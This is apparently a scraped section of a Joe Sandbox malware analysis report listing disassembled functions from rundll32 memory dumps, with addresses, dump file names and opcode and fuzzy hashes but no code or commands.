                                                                                                                                  • Opcode ID: de02513275ad1c1a37e0096a818261c58a998aecf4f08ba4a5899afd53db8295
                                                                                                                                  • Instruction ID: 7802ca9db5044afc23cb1f38c8e105cc531337a4395501fdb7ec6a4e23d2f7b6
                                                                                                                                  • Opcode Fuzzy Hash: de02513275ad1c1a37e0096a818261c58a998aecf4f08ba4a5899afd53db8295
                                                                                                                                  • Instruction Fuzzy Hash: 3D427C32604B4886FBA68B25D5803BD7361FB89BC8F54C512EF8A17B96DF39C659C300
                                                                                                                                  Function 00007FFD92DBC930 Relevance: .6, Instructions: 588COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d486d8ad403630f3863f5076513b28c776fbcfa45cc6a47b78990385d6760ddf
                                                                                                                                  • Instruction ID: d0be15ffec4febac680f9ca00fa9d1c5a487648df99c522fb5e89123d5f7b73d
                                                                                                                                  • Opcode Fuzzy Hash: d486d8ad403630f3863f5076513b28c776fbcfa45cc6a47b78990385d6760ddf
                                                                                                                                  • Instruction Fuzzy Hash: 53B128F2B15B8A42ED28CF95D5642786395AB44BE1F008339DE6D0B7C4EFBCE0958340
                                                                                                                                  Function 00007FFD92DC18D0 Relevance: .6, Instructions: 586COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 376002d931f8e481658ecf30371b07678a7c0f1f68a83f1c046c17b75fb202d2
                                                                                                                                  • Instruction ID: 57385cedb2c7577f97a9f48ee2658f82945c4eb5cf09d0e8f33b4edaf2edd895
                                                                                                                                  • Opcode Fuzzy Hash: 376002d931f8e481658ecf30371b07678a7c0f1f68a83f1c046c17b75fb202d2
                                                                                                                                  • Instruction Fuzzy Hash: 94428F22B08A8585FB308FAAC5A02BE3771FB86B85F148231DE9D17792DF7CE4559344
                                                                                                                                  Function 00000001800279B8 Relevance: .6, Instructions: 572COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Stollx
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3628700584-0
                                                                                                                                  • Opcode ID: eb53157097b9bda4a8a3cf500f3039b16533609824c5f9a5ce3e351e3c28d2aa
                                                                                                                                  • Instruction ID: 42b5d6b38fa8120ab5fcb54182bbeb98c0f4066ebeec1de4c937208e3a875605
                                                                                                                                  • Opcode Fuzzy Hash: eb53157097b9bda4a8a3cf500f3039b16533609824c5f9a5ce3e351e3c28d2aa
                                                                                                                                  • Instruction Fuzzy Hash: B8428D72704A8885EBA78B29C5403AD3762FB89BC8F14C616EF9D17796DF39C659C300
                                                                                                                                  Function 00007FFD92DBE680 Relevance: .6, Instructions: 570COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ccb248dacd1da4c0a64c173775af4704b1e95be83717ebe65486a609d551f01d
                                                                                                                                  • Instruction ID: 5463ab6ddd8c977910133d29a6ec7c98b5a3dbb33e471452f2df84692ae2db7e
                                                                                                                                  • Opcode Fuzzy Hash: ccb248dacd1da4c0a64c173775af4704b1e95be83717ebe65486a609d551f01d
                                                                                                                                  • Instruction Fuzzy Hash: EDC10122B18A848AFB20CFB5E4217ED6371FB48799F405631EE4D27B89DF78D4468380
                                                                                                                                  Function 00007FFD92DBCA50 Relevance: .5, Instructions: 519COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67242c933d7f578ddc0e033992db6ab895da1ac754dfdd9b42b97de7a881f39f
                                                                                                                                  • Instruction ID: ff40623024131849f99b3d3b2845f7e4c741de7a358a269c273b46fdb267c950
                                                                                                                                  • Opcode Fuzzy Hash: 67242c933d7f578ddc0e033992db6ab895da1ac754dfdd9b42b97de7a881f39f
                                                                                                                                  • Instruction Fuzzy Hash: D9E12122B28A848AFB24CBF4D4A07ED27B1AB44788F044639DE4C27BC9DE7DD545C390
                                                                                                                                  Function 00007FFD92DB1710 Relevance: .5, Instructions: 480COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 884bf6c0e1ae83c3b8e1b9ce7b1fe1d0d1bbf17c27d1583f7dbbbc715fb8ccd2
                                                                                                                                  • Instruction ID: a599f53ffe12d25a6cca0de90b5f273c11813186fc084006527b754c718402e8
                                                                                                                                  • Opcode Fuzzy Hash: 884bf6c0e1ae83c3b8e1b9ce7b1fe1d0d1bbf17c27d1583f7dbbbc715fb8ccd2
                                                                                                                                  • Instruction Fuzzy Hash: 32122A73B185918FE329CF78E851BADBBA5FB84389F10512AEB4953F59DA39D4408F00
                                                                                                                                  Function 00007FFD92FE78A4 Relevance: .4, Instructions: 410COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e576d0e7523a203be1bfe945d756d261c96dde24ed5dc90758a244e3ffebe66b
                                                                                                                                  • Instruction ID: 610ce593f1be69aa1e6315239c74ce56ca0906852dab1d0fb95d1dfde508cdc6
                                                                                                                                  • Opcode Fuzzy Hash: e576d0e7523a203be1bfe945d756d261c96dde24ed5dc90758a244e3ffebe66b
                                                                                                                                  • Instruction Fuzzy Hash: FD81C431B09B4241FB36AFA299353796691EF44BA1F145734DA5D07FCAEEBCE8014390
                                                                                                                                  Function 00007FFD92DC64E0 Relevance: .4, Instructions: 397COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1d5551e530aeef4ae870a3c185e3536f225fd99655c84af725c84d43b450b0a8
                                                                                                                                  • Instruction ID: 6125ec4a80ef52a36b9140e2bcfd89842b556d2acf26f5026ce3b20cb36ab085
                                                                                                                                  • Opcode Fuzzy Hash: 1d5551e530aeef4ae870a3c185e3536f225fd99655c84af725c84d43b450b0a8
                                                                                                                                  • Instruction Fuzzy Hash: 37B1F362B15A448AFB20CFBAE4216ED6372BB48799F405721EE0D27B89DF78D446C340
                                                                                                                                  Function 00007FFD92DBF860 Relevance: .3, Instructions: 337COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0911ba380e7eacc822f6d16e3abbb83c1ae2bd3f4a626c75455e34fa112bd6c3
                                                                                                                                  • Instruction ID: f7b5d160100c9283e872856ceabdb701116ec58c47f1cf646989670e6ee257ad
                                                                                                                                  • Opcode Fuzzy Hash: 0911ba380e7eacc822f6d16e3abbb83c1ae2bd3f4a626c75455e34fa112bd6c3
                                                                                                                                  • Instruction Fuzzy Hash: 1EE18D32B04B8185FB20DFA2E8616EE27A4FB95785F015A35DE9D53B86EF78D244C340
                                                                                                                                  Function 00007FFD92DB2210 Relevance: .3, Instructions: 261COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2eae875547794a16e0675afe47470714772bb7ed71b2cc58b56aa0415c8127d7
                                                                                                                                  • Instruction ID: c4023500237c51aa41090127de21b3c1a0f0599d6c5f230c4072788414511614
                                                                                                                                  • Opcode Fuzzy Hash: 2eae875547794a16e0675afe47470714772bb7ed71b2cc58b56aa0415c8127d7
                                                                                                                                  • Instruction Fuzzy Hash: 87C1CE72B086C28AE730DF94E4A07EABBA1F788745F504139DA8E47B94DB7DE545CB00
                                                                                                                                  Function 00007FFD92DCA360 Relevance: .1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
